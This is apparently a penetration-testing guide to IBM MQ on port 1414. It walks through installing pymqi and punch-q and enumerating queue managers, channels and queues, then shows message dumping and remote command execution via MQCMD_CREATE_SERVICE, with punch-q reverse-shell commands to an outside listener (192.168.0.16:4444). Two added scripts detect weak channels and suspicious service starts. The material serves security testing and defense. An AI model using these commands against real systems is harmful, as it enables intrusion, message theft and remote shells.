1414 - Pentesting IBM MQ


Basic information

IBM MQ is IBM's technology for managing message queues. Like other message broker technologies, it is meant to receive, store, process and classify information between producers and consumers.

By default, it exposes the IBM MQ TCP port 1414. Sometimes the HTTP REST API can be exposed on port 9443. Metrics (Prometheus) can also be reached on TCP port 9157.

The IBM MQ TCP port 1414 can be used to manipulate messages, queues, channels, ... but also to control the instance itself.

IBM provides extensive technical documentation at https://www.ibm.com/docs/en/ibm-mq.

Tools

The recommended tool for easy exploitation is punch-q, used via Docker. This tool relies on the Python library pymqi.

For a more manual approach, use the Python library pymqi directly. The IBM MQ dependencies are required.

Installing pymqi

The IBM MQ dependencies need to be installed and loaded:

  1. Create an account (IBMid) on https://login.ibm.com/.
  2. Download the IBM MQ libraries from https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc. For Linux x86_64 it is 9.0.0.4-IBM-MQC-LinuxX64.tar.gz.
  3. Decompress it (tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz).
  4. Run sudo ./mqlicense.sh to accept the license terms.

If you are on Kali Linux, edit the mqlicense.sh file: remove/comment the following lines (between lines 105-110):

```bash
if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
 then
   echo "ERROR: This package is incompatible with this system"
   echo "       This package was built for ${BUILD_PLATFORM}"
   exit 1
fi
```

  5. Install these packages:

```bash
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
```

  6. Then, add the .so files to the runtime library path with export LD_LIBRARY_PATH=/opt/mqm/lib64 before using any tool that depends on these libraries.

Then, you can clone the pymqi project: it contains interesting code snippets, constants, ... Or you can install the library directly with: pip install pymqi.

Using punch-q

With Docker

Simply use: sudo docker run --rm -ti leonjza/punch-q.

Without Docker

Clone the punch-q project and follow the readme for installation (pip install -r requirements.txt && python3 setup.py install).

Afterwards, it can be used with the punch-q command.

Enumeration

You can try to enumerate the queue manager name, users, channels and queues with punch-q or pymqi.

Queue Manager

Sometimes, there is no protection against obtaining the Queue Manager's name:

```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
Queue Manager name: MYQUEUEMGR
```

Channels

punch-q uses an internal (modifiable) wordlist to find existing channels. Usage example:

```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
"DEV.ADMIN.SVRCONN" exists and was authorised.
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
```

It turns out that some IBM MQ instances accept unauthenticated MQ requests, so --username / --password are not needed. Of course, access rights can also vary.

As soon as we get one channel name (here: DEV.ADMIN.SVRCONN), we can enumerate all the other channels.

The enumeration can basically be done with this code snippet, code/examples/dis_channels.py from pymqi:

```python
import logging
import pymqi

logging.basicConfig(level=logging.INFO)

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

prefix = '*'

# PCF filter: inquire every channel whose name matches the prefix
args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
    response = pcf.MQCMD_INQUIRE_CHANNEL(args)
except pymqi.MQMIError as e:
    if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
        logging.info('No channels matched prefix `%s`' % prefix)
    else:
        raise
else:
    for channel_info in response:
        channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
        logging.info('Found channel `%s`' % channel_name)

qmgr.disconnect()
```

... But punch-q also embeds that part (with more details!). It can be launched with:

```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
Showing channels with prefix: "*"...
```

| Name                 | Type              | MCA UID | Conn Name | Xmit Queue | Description     | SSL Cipher |
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
| DEV.ADMIN.SVRCONN    | Server-connection |         |           |            |                 |            |
| DEV.APP.SVRCONN      | Server-connection | app     |           |            |                 |            |
| SYSTEM.AUTO.RECEIVER | Receiver          |         |           |            | Auto-defined by |            |
| SYSTEM.AUTO.SVRCONN  | Server-connection |         |           |            | Auto-defined by |            |
| SYSTEM.DEF.AMQP      | AMQP              |         |           |            |                 |            |
| SYSTEM.DEF.CLUSRCVR  | Cluster-receiver  |         |           |            |                 |            |
| SYSTEM.DEF.CLUSSDR   | Cluster-sender    |         |           |            |                 |            |
| SYSTEM.DEF.RECEIVER  | Receiver          |         |           |            |                 |            |
| SYSTEM.DEF.REQUESTER | Requester         |         |           |            |                 |            |
| SYSTEM.DEF.SENDER    | Sender            |         |           |            |                 |            |
| SYSTEM.DEF.SERVER    | Server            |         |           |            |                 |            |
| SYSTEM.DEF.SVRCONN   | Server-connection |         |           |            |                 |            |
| SYSTEM.DEF.CLNTCONN  | Client-connection |         |           |            |                 |            |
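
From the defender's side, the same table is a quick hardening check. The added example below (written for this page; it is not punch-q or pymqi code) parses a table in the layout punch-q prints and flags two things a reviewer would look at first: server-connection channels with a blank MCA UID (MCAUSER), where the queue manager runs the channel under whatever user ID the client asserts unless a CHLAUTH/CONNAUTH rule overrides it, and the default SYSTEM.* server-connection channels that are still defined. The sample rows are constructed from the output above, not captured from a live queue manager.

```python
import re

# Constructed sample in the layout of punch-q's `show channels` table
# (a subset of the rows shown above; not captured from a live queue manager).
SAMPLE_TABLE = """\
| Name                 | Type              | MCA UID | Conn Name | Xmit Queue | Description     | SSL Cipher |
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
| DEV.ADMIN.SVRCONN    | Server-connection |         |           |            |                 |            |
| DEV.APP.SVRCONN      | Server-connection | app     |           |            |                 |            |
| SYSTEM.AUTO.SVRCONN  | Server-connection |         |           |            | Auto-defined by |            |
| SYSTEM.DEF.SVRCONN   | Server-connection |         |           |            |                 |            |
| SYSTEM.DEF.RECEIVER  | Receiver          |         |           |            |                 |            |
"""

SEPARATOR_CELL = re.compile(r"-+")


def parse_channel_table(text):
    """Turn a pipe-delimited table into a list of dicts keyed by the header cells."""
    header = None
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue  # skip surrounding prose / progress lines
        cells = [c.strip() for c in line.strip("|").split("|")]
        if header is None:
            header = cells
        elif all(SEPARATOR_CELL.fullmatch(c) for c in cells):
            continue  # the |----| separator row
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def svrconn_without_mcauser(rows):
    """Server-connection channels with a blank MCA UID (MCAUSER): the channel runs
    under the user ID the client asserts unless CHLAUTH/CONNAUTH overrides it."""
    return [r["Name"] for r in rows
            if r["Type"] == "Server-connection" and r["MCA UID"] == ""]


def exposed_system_svrconn(rows):
    """Default SYSTEM.* server-connection channels that are still defined; hardened
    queue managers block these with CHLAUTH or give them a non-functional MCAUSER."""
    return [r["Name"] for r in rows
            if r["Type"] == "Server-connection" and r["Name"].startswith("SYSTEM.")]


if __name__ == "__main__":
    parsed = parse_channel_table(SAMPLE_TABLE)
    for name in svrconn_without_mcauser(parsed):
        print("SVRCONN channel without MCAUSER:", name)
    for name in exposed_system_svrconn(parsed):
        print("default SYSTEM channel still defined:", name)
```

Feed it the real punch-q output (or the equivalent DISPLAY CHANNEL listing) and every name it prints is a channel whose MCAUSER and CHLAUTH rules deserve a look.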

Queues

There is a code snippet with pymqi (dis_queues.py), but punch-q lets you retrieve more pieces of information about the queues:

```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
Showing queues with prefix: "*"...
```

| Created             | Name                  | Type  | Usage  | Depth | Rmt. QMGR Name | Rmt. Queue Name | Description |
|---------------------|-----------------------|-------|--------|-------|----------------|-----------------|-------------|
| 2023-10-10 18.35.19 | DEV.DEAD.LETTER.QUEUE | Local | Normal | 0     |                |                 |             |
| 2023-10-10 18.35.19 | DEV.QUEUE.1           | Local | Normal | 0     |                |                 |             |
| 2023-10-10 18.35.19 | DEV.QUEUE.2           | Local | Normal | 0     |                |                 |             |
| 2023-10-10 18.35.19 | DEV.QUEUE.3           | Local | Normal | 0     |                |                 |             |

Output truncated.

Exploit

Dump messages

You can target the queue(s)/channel(s) to sniff / dump messages from them (a non-destructive operation). Examples:

```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff
```

```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump
```

Don't hesitate to try it on all the identified queues.

Code execution

A few details before continuing: IBM MQ can be controlled in several ways: MQSC, PCF, Control Command. General lists can be found in the IBM MQ documentation. PCF (Programmable Command Formats) is what we focus on to interact remotely with the instance. punch-q and, more broadly, pymqi rely on PCF interactions.

You can find the list of PCF commands in the IBM MQ documentation.

One interesting command is MQCMD_CREATE_SERVICE, whose documentation is available here. It takes as argument a StartCommand pointing to a local program on the instance (example: /bin/sh).

There is also a warning about this command in the documentation: "Note: This command allows a user to run an arbitrary command with mqm authority. If granted rights to use this command, a malicious or careless user could define a service which damages your systems or data, for example, by deleting essential files."

Note: still according to the IBM MQ documentation (Administration Reference), there is also an HTTP endpoint at /admin/action/qmgr/{qmgrName}/mqsc to run the equivalent MQSC command for service creation (DEFINE SERVICE). This aspect is not covered here yet.

Creating / deleting a service with PCF for remote program execution can be done with punch-q:

Example 1

```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"
```

In the IBM MQ logs, you can read that the command was successfully executed:

```
2023-10-10T19:13:01.713Z AMQ5030I: The Command '808544aa7fc94c48' has started. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
```

You can also enumerate the programs present on the machine (here /bin/doesnotexist ... does not exist):

```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --args "whatever"
Command: /bin/doesnotexist
Arguments: -c id
Service Name: 6e3ef5af652b4436

Creating service...
Starting service...
The program '/bin/doesnotexist' is not available on the remote system.
Giving the service 0 second(s) to live...
Cleaning up service...
Done
```

Note that the program launch is asynchronous. So you need a second component to make use of the exploit (a listener for a reverse shell, file creation on a different service, data exfiltration over the network ...).
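
The AMQ5030I entry quoted above is also the detection hook: every SERVICE object start is logged with the service name and PID, and the services punch-q creates carry 16-character random hex names, as the two names shown on this page do. The following added example (written for this page, not part of punch-q, pymqi or IBM MQ) parses such log lines and reports service starts that are not on an administrator-maintained allowlist, tagging the ones whose name looks auto-generated. The log lines, service names and PIDs in the sample are constructed for the example.

```python
import re

# Constructed error-log sample in the shape of the AMQ5030I entry quoted above.
# Timestamps, service names and PIDs are made up for this example.
SAMPLE_LOG = """\
2023-10-10T19:12:40.002Z AMQ5037I: The queue manager task 'ERROR-LOG' has started.
2023-10-10T19:12:41.110Z AMQ5030I: The Command 'NIGHTLY.BACKUP' has started. ProcessId(601). [ArithInsert1(601), CommentInsert1(NIGHTLY.BACKUP)]
2023-10-10T19:13:01.713Z AMQ5030I: The Command '808544aa7fc94c48' has started. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
2023-10-10T19:14:11.420Z AMQ5030I: The Command '6e3ef5af652b4436' has started. ProcessId(702). [ArithInsert1(702), CommentInsert1(6e3ef5af652b4436)]
"""

# AMQ5030I is written each time a queue manager SERVICE object is started.
SERVICE_START_RE = re.compile(
    r"^(?P<ts>\S+) AMQ5030I: The Command '(?P<name>[^']+)' has started\. ProcessId\((?P<pid>\d+)\)"
)
# punch-q names the services it creates with 16 random hex characters.
RANDOM_NAME_RE = re.compile(r"[0-9a-f]{16}")


def parse_service_starts(log_text):
    """Extract timestamp, service name and PID from every AMQ5030I line."""
    events = []
    for line in log_text.splitlines():
        m = SERVICE_START_RE.match(line)
        if m:
            events.append({"time": m.group("ts"),
                           "service": m.group("name"),
                           "pid": int(m.group("pid"))})
    return events


def flag_unexpected_services(events, allowlist):
    """Report service starts whose name is not a deliberately defined service."""
    findings = []
    for ev in events:
        if ev["service"] in allowlist:
            continue
        reason = "service not in allowlist"
        if RANDOM_NAME_RE.fullmatch(ev["service"]):
            reason += "; name looks auto-generated (16 hex chars, punch-q style)"
        findings.append(dict(ev, reason=reason))
    return findings


if __name__ == "__main__":
    known_services = {"NIGHTLY.BACKUP"}  # constructed allowlist of services you defined yourself
    for f in flag_unexpected_services(parse_service_starts(SAMPLE_LOG), known_services):
        print(f"{f['time']} pid={f['pid']} service={f['service']}: {f['reason']}")
```

On a real queue manager, point it at the error logs under the queue manager's errors directory (by default /var/mqm/qmgrs/<qmgr>/errors/) and keep the allowlist in sync with the SERVICE objects you have actually defined; any other AMQ5030I entry means someone with MQCMD_CREATE_SERVICE rights started a program under the mqm identity.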

Example 2

For an easy reverse shell, punch-q also proposes two reverse shell payloads:

  • One with bash
  • One with perl

Of course, you can build a custom one with the execute command.

With bash:

```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```

With perl:

```bash
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```

Custom PCF

You can dig into the IBM MQ documentation and use the pymqi Python library directly to test specific PCF commands that are not implemented in punch-q.

Example:

```python
import pymqi

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
    # Replace here with your custom PCF args and command
    # The constants can be found in pymqi/code/pymqi/CMQCFC.py
    args = {pymqi.CMQCFC.xxxxx: "value"}
    response = pcf.MQCMD_CUSTOM_COMMAND(args)
except pymqi.MQMIError as e:
    print("Error: %s" % e)
else:
    # Process response
    print(response)

qmgr.disconnect()
```

If you cannot find the constant names, you can refer to the IBM MQ documentation.

Example with MQCMD_REFRESH_CLUSTER (Decimal = 73). It requires the parameter MQCA_CLUSTER_NAME (Decimal = 2029), which can be `*` (see the IBM MQ documentation):

```python
import pymqi

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
    # 2029 = MQCA_CLUSTER_NAME; '*' refreshes every cluster the queue manager belongs to
    args = {2029: "*"}
    response = pcf.MQCMD_REFRESH_CLUSTER(args)
except pymqi.MQMIError as e:
    print("Error")
else:
    print(response)

qmgr.disconnect()
```

Testing environment

If you want to test IBM MQ behaviour and exploits, you can set up a local environment based on Docker:

  1. Have an account on ibm.com and cloud.ibm.com.
  2. Create a containerized IBM MQ with:

```bash
sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2
```

By default, authentication is enabled, the username is admin and the password is passw0rd (environment variable MQ_ADMIN_PASSWORD). Here, the queue manager name has been set to MYQUEUEMGR (variable MQ_QMGR_NAME).

You should have IBM MQ up and running with its ports exposed:

```bash
❯ sudo docker ps
CONTAINER ID   IMAGE                                COMMAND                  CREATED         STATUS                    PORTS                                                                    NAMES
58ead165e2fd   icr.io/ibm-messaging/mq:9.3.2.0-r2   "runmqdevserver"         3 seconds ago   Up 3 seconds              0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp   testing-ibmmq
```

The older IBM MQ docker images are at: https://hub.docker.com/r/ibmcom/mq/.

References